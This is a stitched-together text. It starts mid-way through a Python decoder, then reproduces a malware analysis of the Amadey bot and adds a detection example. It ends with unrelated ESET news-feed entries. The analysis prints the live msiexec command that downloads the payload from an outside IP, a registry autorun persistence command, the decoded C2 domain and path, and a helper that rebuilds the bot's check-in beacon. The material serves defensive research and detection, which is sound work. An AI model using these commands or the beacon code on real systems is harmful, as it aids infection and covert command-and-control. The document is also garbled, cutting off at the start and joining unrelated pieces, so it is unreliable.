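    for name, enc in table.items():
        try:
            result[name] = decode_string(enc, key)
        except ValueError:
            result[name] = "raw:" + ",".join(str(v) for v in decode_raw(enc, key))
    return result


def build_checkin(bot_id: str, is_admin: bool, arch: str, lv: int, os_code: int,
                  av_code: int, host: str, user: str, version: str = "1.22") -> str:
    """Reproduce the POST body that _Z6aBasici concatenates: Param0..Param8 in order
    (id, vs, ar, bi, lv, os, av, pc, un), then a trailing '&'.  The values are whatever
    the caller passes; the real sample fills them in from the infected host."""
    return (f"id={bot_id}&vs={version}&ar={1 if is_admin else 0}&bi={arch}&lv={lv}"
            f"&os={os_code}&av={av_code}&pc={host}&un={user}&")


if __name__ == "__main__":
    for name, value in decode_all(ENCODED).items():
        print(f"{name:9s} {value!r}")
    # Constructed values, only to show the shape of the beacon that is POSTed to
    # http://<domain>/<Script>, i.e. gohaiendo[.]com/ppk/index.php.
    print(build_checkin("0123456789", False, "x86", 0, 1, 0, "WORKSTATION", "user"))
```

decode_string deliberately refuses output that is not clean ASCII rather than emitting mojibake; that is the check that separates genuine strings from blobs such as TimeOut, which the sample passes to Sleep rather than to strcat.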
    <h2 id="initial-access">Initial Access</h2> <p>Amadey is installed by msiexec.exe when the malicious Excel file is opened. Judging from the document technique, the threat actor is considered to be TA505.</p> <ul> <li><a href="https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/">Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently</a></li> <li><a href="https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware">Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware</a></li> </ul> <p><img src="https://nao-sec.org/assets/2019-04-28/01.jpg" width="100%" /> https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784</p> <p>The download URL is as follows:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' </code></pre></div></div> <h2 id="first-payload">First payload</h2> <p>The first payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner.</p> <p><img src="https://nao-sec.org/assets/2019-04-28/02.jpg" width="100%" /></p> <h2 id="amadey">Amadey</h2> <p>The dumped PE is compiled with MinGW.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PE: compiler: MinGW(-)[-] PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32] </code></pre></div></div> <p>It contains symbol information.
Amadey has the following functions:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_Z10aBypassUACv _Z10aCharToIntPc _Z10aGetOsArchv _Z10aIntToChari _Z11aAutoRunSetPc _Z11aCheckAdminv _Z11aCreateFilePc _Z11aFileExistsPKc _Z11aGetTempDirv _Z11aProcessDllPcS_ _Z11aProcessExePcS_S_S_ _Z11aRunAsAdminPc _Z12aGetHostNamev _Z12aGetSelfPathv _Z12aGetUserNamev _Z12aProcessTaskPc _Z12aResolveHostPc _Z12aWinSockPostPcS_S_ _Z13aDropToSystemPc _Z13aGetProcessILv _Z14aCreateProcessPc _Z14aGetProgramDirv _Z15aUrlMonDownloadPcS_ _Z16aDirectoryExistsPc _Z16aExtractFileNamePc _Z16aGetHomeDriveDirv _Z16aProcessDllLocalPcS_S_S_ _Z16aProcessExeLocalPcS_S_S_ _Z19aGetSelfDestinationi _Z5aCopyPcii _Z5aParsPcS_ _Z6aBasici _Z6aGetIdv _Z6aGetOsv _Z6aMkDirPc _Z7aPathAVPc _Z7aRaportPcS_ _Z8aCheckAVv _Z8aDecryptPc _Z8aPosLastPcS_ _Z9aCopyFilePcS_ _Z9aFileSizePc _Z9aFillCharPc _Z9aFreeFilePc _Z9aPosFirstPcS_ _Z9aRunDll32PcS_ </code></pre></div></div> <p>The main function is as follows.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">_Argc</span><span class="p">,</span><span class="kt">char</span> <span class="o">**</span><span class="n">_Argv</span><span class="p">,</span><span class="kt">char</span> <span class="o">**</span><span class="n">_Env</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">pcVar1</span><span class="p">;</span> <span class="cm">/* 0x3ac8 97 main */</span> <span class="n">FUN_00404020</span><span class="p">();</span> <span class="n">FUN_00403cc0</span><span class="p">();</span> <span class="n">_Z10aBypassUACv</span><span class="p">();</span> <span class="n">pcVar1</span> <span class="o">=</span> <span class="n">_Z12aGetSelfPathv</span><span
class="p">();</span> <span class="n">_Z13aDropToSystemPc</span><span class="p">(</span><span class="n">pcVar1</span><span class="p">);</span> <span class="n">pcVar1</span> <span class="o">=</span> <span class="n">_Z19aGetSelfDestinationi</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">_Z11aAutoRunSetPc</span><span class="p">(</span><span class="n">pcVar1</span><span class="p">);</span> <span class="n">_Z6aBasici</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>The _Z6aBasici function is as follows.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */</span> <span class="kt">void</span> <span class="kr">__cdecl</span> <span class="nf">_Z6aBasici</span><span class="p">(</span><span class="kt">int</span> <span class="n">param_1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">_Source</span><span class="p">;</span> <span class="n">uint</span> <span class="n">uVar1</span><span class="p">;</span> <span class="kt">int</span> <span class="n">iVar2</span><span class="p">;</span> <span class="cm">/* 0x33fe 32 _Z6aBasici */</span> <span class="n">FUN_00404020</span><span class="p">();</span> <span class="n">_Z9aFillCharPc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">stack0xffffeff4</span><span class="p">);</span> <span class="n">_Z9aFillCharPc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">stack0xffffddf4</span><span class="p">);</span> <span class="n">_Z9aFillCharPc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">stack0xffffdbf4</span><span class="p">);</span> 
_Source = _Z8aDecryptPc(&amp;aDomain);
strcat(&amp;stack0xffffddf4,_Source);
_Source = _Z8aDecryptPc(&amp;aScript);
strcat(&amp;stack0xffffdbf4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam0);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z6aGetIdv();
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam1);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aVers);
strcat(&amp;stack0xffffeff4,_Source);
uVar1 = _Z11aCheckAdminv();
if ((uVar1 &amp; 0xff) == 1) {
  _Source = _Z8aDecryptPc(&amp;aParam2);
  strcat(&amp;stack0xffffeff4,_Source);
  strcat(&amp;stack0xffffeff4,"1");
}
else {
  _Source = _Z8aDecryptPc(&amp;aParam2);
  strcat(&amp;stack0xffffeff4,_Source);
  strcat(&amp;stack0xffffeff4,"0");
}
_Source = _Z8aDecryptPc(&amp;aParam3);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z10aGetOsArchv();
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam4);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z10aIntToChari(param_1);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam5);
strcat(&amp;stack0xffffeff4,_Source);
iVar2 = _Z6aGetOsv();
_Source = _Z10aIntToChari(iVar2);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam6);
strcat(&amp;stack0xffffeff4,_Source);
uVar1 = _Z8aCheckAVv();
_Source = _Z10aIntToChari(uVar1);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam7);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z12aGetHostNamev();
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z8aDecryptPc(&amp;aParam8);
strcat(&amp;stack0xffffeff4,_Source);
_Source = _Z12aGetUserNamev();
strcat(&amp;stack0xffffeff4,_Source);
strcat(&amp;stack0xffffeff4,"&amp;");
if (param_1 == 0) {
  do {
    _Z9aFillCharPc(&amp;stack0xffffdff4);
    _Source = _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
    strcat(&amp;stack0xffffdff4,_Source);
    _Z5aParsPcS_(&amp;stack0xffffdff4,"#");
    Sleep(_aTimeOut);
  } while( true );
}
if (param_1 == 1) {
  _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
}
return;
}
</code></pre></div></div>
<p>Some important parameters are encoded.
However, the encoding algorithm is very simple.</p>
<p><img src="https://nao-sec.org/assets/2019-04-28/03.jpg" width="80%" /></p>
<p>The key is <code class="language-plaintext highlighter-rouge">8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7</code></p>
<p><img src="https://nao-sec.org/assets/2019-04-28/04.jpg" width="100%" /></p>
<p>Finally, we analyze the decoded strings and the names of the functions in which they are used.</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">_Z11aAutoRunSetPc</code>
<ul>
<li>AutoRunCmd : <code class="language-plaintext highlighter-rouge">REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d </code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z8aCheckAVv</code>
<ul>
<li>AV00 : AVAST Software</li>
<li>AV01 : Avira</li>
<li>AV02 : Kaspersky Lab</li>
<li>AV03 : ESET</li>
<li>AV04 : Panda Security</li>
<li>AV05 : Doctor Web</li>
<li>AV06 : AVG</li>
<li>AV07 : 360TotalSecurity</li>
<li>AV08 : Bitdefender</li>
<li>AV09 : Norton</li>
<li>AV10 : Sophos</li>
<li>AV11 : Comodo</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code>
<ul>
<li>CMD0 : <code class="language-plaintext highlighter-rouge">&lt;c&gt;</code></li>
<li>CMD1 : <code class="language-plaintext highlighter-rouge">&lt;d&gt;</code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z11aProcessDllPcS_</code>
<ul>
<li>dll : dll</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code>
<ul>
<li>domain : gohaiendo[.]com</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z19aGetSelfDestinationi</code>
<ul>
<li>DropDir : f64a428dfd</li>
<li>DropName : cmualrc.exe</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z11aProcessExePcS_S_S_</code>
<ul>
<li>exe : exe</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z14aGetProgramDirv</code>
<ul>
<li>GetProgDir : ProgramData\</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z10aGetOsArchv, _Z6aGetOsv</code>
<ul>
<li>OS_AR0 : kernel32.dll</li>
<li>OS_AR1 : GetNativeSystemInfo</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z6aBasici</code>
<ul>
<li>Param0 : id=</li>
<li>Param1 : &amp;vs=</li>
<li>Param2 : &amp;ar=</li>
<li>Param3 : &amp;bi=</li>
<li>Param4 : &amp;lv=</li>
<li>Param5 : &amp;os=</li>
<li>Param6 : &amp;av=</li>
<li>Param7 : &amp;pc=</li>
<li>Param8 : &amp;un=</li>
<li>Vers : 1.22</li>
<li>ZoneIdent : <code class="language-plaintext highlighter-rouge">:Zone.Identifier</code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code>
<ul>
<li>Post0 : 1310</li>
<li>Post1 : HTTP/1.1</li>
<li>Post2 : <code class="language-plaintext highlighter-rouge">Accept: */*</code></li>
<li>Post3 : Content-Type: application/x-www-form-urlencoded</li>
<li>Post4 : Host:</li>
<li>Post5 : Content-Length:</li>
<li>Post6 : POST /</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z11aRunAsAdminPc</code>
<ul>
<li>RunAs : runas</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z9aRunDll32PcS_</code>
<ul>
<li>RunDll_0 : rundll32.exe</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code>
<ul>
<li>Script : ppk/index.php</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z11aCheckAdminv</code>
<ul>
<li>Shell : SHELL32.DLL</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z14aCreateProcessPc, _Z6aBasici</code>
<ul>
<li>TimeOut : 40133-98-10017</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">_Z15aUrlMonDownloadPcS_</code>
<ul>
<li>URLMon_0 : urlmon</li>
<li>URLMon_1 : URLDownloadToFileA</li>
</ul>
</li>
</ul>
<p>Here is the simple Python script.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'''
domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85]
AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00
AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94]
AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92]
AV03=[0x7D, 0xB8, 0xA7, 0xB8]
AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD]
AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B]
AV06=[0x79, 0xBB, 0xA9]
AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2]
AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5]
AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7]
AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC]
AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8]
CMD0=[0x74, 0xC8, 0xA0]
CMD1=[0x74, 0xC9, 0xA0]
DLL=[0x9C, 0xD1, 0xCE]
DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D]
DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98]
exe=[0x9D, 0xDD, 0xC7]
GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE]
OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE]
OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F]
Param0=[0xA1, 0xC9, 0x9F]
Param1=[0x5E, 0xDB, 0xD5, 0xA1]
Param2=[0x5E, 0xC6, 0xD4, 0xA1]
Param3=[0x5E, 0xC7, 0xCB, 0xA1]
Param4=[0x5E, 0xD1, 0xD8, 0xA1]
Param5=[0x5E, 0xD4, 0xD5, 0xA1]
Param6=[0x5E, 0xC6, 0xD8, 0xA1]
Param7=[0x5E, 0xD5, 0xC5, 0xA1]
Param8=[0x5E, 0xDA, 0xD0, 0xA1]
Post0=[0x45, 0x6F]
Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67]
Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D]
Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C]
Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59]
Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59]
Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68]
RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6]
RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50]
Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0]
Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F]
TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44]
URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7]
URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77]
Vers=[0x69, 0x93, 0x94, 0x96]
ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB]
'''

# The "domain" array from the table above.
encoded_str = [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
Key = "8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# Each encoded byte is the plaintext character plus the key character at the
# same position; the key wraps around when the string is longer than the key.
c = 0
while c &lt; len(encoded_str):
    print(chr(encoded_str[c] - ord(Key[c % len(Key)])), end='')
    #print(encoded_str[c] - ord(Key[c % len(Key)]), end='')
    c += 1
print()
</code></pre></div></div>
<h1 id="references">References</h1>
<ul>
<li>https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/</li> </ul>
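The decoding routine and the check-in layout above, carried a step further as an added example (this is not nao_sec's script and not Amadey code). It decodes the byte arrays with the key from the post, checks them against the plaintexts listed above, and then builds a detection regex for the POST body from the decoded Param0..Param8 labels, in the order the decompiled function concatenates them (ending with the bare "&amp;" the code appends last). The function names are mine, and the two sample bodies are constructed test strings, not captured traffic; the bot id, host name and user name in them are made up.

```python
"""Decode Amadey's encoded string table and derive a check-in body detector.

Added example, not code from the nao_sec post. The key and the byte arrays
are copied from the post; the field order follows the decompiled function.
"""
from __future__ import annotations

import re

KEY = "8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# Encoded arrays exactly as listed in the post (a subset of the full table).
ENCODED = {
    "domain": [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D],
    "Script": [0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0],
    "Vers":   [0x69, 0x93, 0x94, 0x96],
    "Post6":  [0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68],
    "Param0": [0xA1, 0xC9, 0x9F],
    "Param1": [0x5E, 0xDB, 0xD5, 0xA1],
    "Param2": [0x5E, 0xC6, 0xD4, 0xA1],
    "Param3": [0x5E, 0xC7, 0xCB, 0xA1],
    "Param4": [0x5E, 0xD1, 0xD8, 0xA1],
    "Param5": [0x5E, 0xD4, 0xD5, 0xA1],
    "Param6": [0x5E, 0xC6, 0xD8, 0xA1],
    "Param7": [0x5E, 0xD5, 0xC5, 0xA1],
    "Param8": [0x5E, 0xDA, 0xD0, 0xA1],
}


def decode(encoded: list[int], key: str = KEY) -> str:
    """Undo the encoding: every byte is plaintext char + key char at that index.

    The key repeats when the encoded string is longer than the key.
    """
    return "".join(chr(b - ord(key[i % len(key)])) for i, b in enumerate(encoded))


def decode_table(table: dict[str, list[int]] = ENCODED) -> dict[str, str]:
    """Decode every named array, e.g. {"domain": "gohaiendo.com", ...}."""
    return {name: decode(arr) for name, arr in table.items()}


# Order in which the decompiled routine strcat()s the labels into the body.
FIELD_ORDER = ["Param0", "Param1", "Param2", "Param3", "Param4",
               "Param5", "Param6", "Param7", "Param8"]


def build_checkin_regex(strings: dict[str, str]) -> re.Pattern[str]:
    """Build a regex for the check-in body from the decoded labels.

    A label such as "&vs=" becomes a named group "vs" whose value runs up to
    the next "&". The body ends with a bare "&", as the code appends one last.
    """
    parts = []
    for name in FIELD_ORDER:
        label = strings[name]             # e.g. "id=" or "&vs="
        group = label.strip("&=")         # e.g. "id" or "vs"
        parts.append(re.escape(label) + f"(?P<{group}>[^&]*)")
    return re.compile("^" + "".join(parts) + "&$")


def parse_checkin(body: str, pattern: re.Pattern[str] | None = None) -> dict[str, str] | None:
    """Return the check-in fields if `body` has Amadey's layout, else None."""
    pattern = pattern or build_checkin_regex(decode_table())
    m = pattern.match(body)
    return m.groupdict() if m else None


# Constructed sample bodies (not captured traffic); all values are made up.
SAMPLE_HIT = "id=0123456789&vs=1.22&ar=0&bi=1&lv=0&os=10&av=3&pc=WORKSTATION-01&un=alice&"
SAMPLE_MISS = "user=alice&action=login"

if __name__ == "__main__":
    strings = decode_table()
    print(strings["Post6"], strings["Script"], "on", strings["domain"])  # POST /ppk/index.php on gohaiendo.com
    print(parse_checkin(SAMPLE_HIT))
    print(parse_checkin(SAMPLE_MISS))
```

Deriving the pattern from the decoded strings rather than typing it in keeps the detector honest: if the decoder were wrong, the labels would not match the layout the decompiled code shows, and the constructed sample would fail to parse. In a real deployment the regex would be applied to the body of POST requests to the decoded script path, with the extracted `vs`, `pc` and `un` fields used for triage rather than anything else.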
  63. The evolving landscape of data privacy: Key trends to shape 2025

    Thu, 23 Jan 2025 12:06:40 -0000

    Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams. As Data Privacy Week (January 27-31) and Data Protection Day (January 28) approach, it’s the perfect time to spotlight the critical role data protection plays in the success of modern organizations. In fact, privacy and data protection go … More: https://blog.eset.ie/2025/01/23/the-evolving-landscape-of-data-privacy-key-trends-to-shape-2025/
  64. ESET discovers new APT group and its supply chain attack on South Korean VPN service

    Wed, 22 Jan 2025 09:53:44 -0000

    ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a newly discovered and previously undetected China-aligned APT group that ESET has named PlushDaemon. In this cyberespionage operation, the attackers replaced the legitimate installer with one that also deployed the group’s signature implant, which ESET has named SlowStepper — a … More: https://blog.eset.ie/2025/01/22/eset-discovers-new-apt-group-and-its-supply-chain-attack-on-south-korean-vpn-service/
  65. Under lock and key: Protecting corporate data from cyberthreats in 2025

    Tue, 21 Jan 2025 12:05:23 -0000

    Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage. There were over 3,200 data compromises in the United States in 2023, with 353 million victims, including those affected multiple times, according to the US Identity Theft Resource Center (ITRC). Each one of those individuals … More: https://blog.eset.ie/2025/01/21/under-lock-and-key-protecting-corporate-data-from-cyberthreats-in-2025/
  66. Europe prepared strategy to protect hospitals from cyberattacks

    Thu, 16 Jan 2025 11:05:05 -0000

    The European Union is stepping in to help hospitals and healthcare providers combat increasing cyberattacks. According to Politico*, the European Commission has unveiled an “action plan” to enhance cybersecurity in the sector, which includes additional funding for securing hospitals’ technical infrastructure, guidance on applying existing rules like the EU’s NIS2 cybersecurity directive, and improved information-sharing. Since … More: https://blog.eset.ie/2025/01/16/europe-prepared-strategy-to-protect-hospitals-from-cyberattacks/
  67. ESET Research discovers UEFI Secure Boot bypass vulnerability

    Thu, 16 Jan 2025 10:28:03 -0000

    ESET researchers have discovered a vulnerability, affecting the majority of UEFI-based systems, that allows actors to bypass UEFI Secure Boot. This vulnerability, assigned CVE-2024-7344, was found in a UEFI application signed by Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party UEFI certificate. Exploitation of this vulnerability can lead to the execution of untrusted code during system … More: https://blog.eset.ie/2025/01/16/eset-research-discovers-uefi-secure-boot-bypass-vulnerability/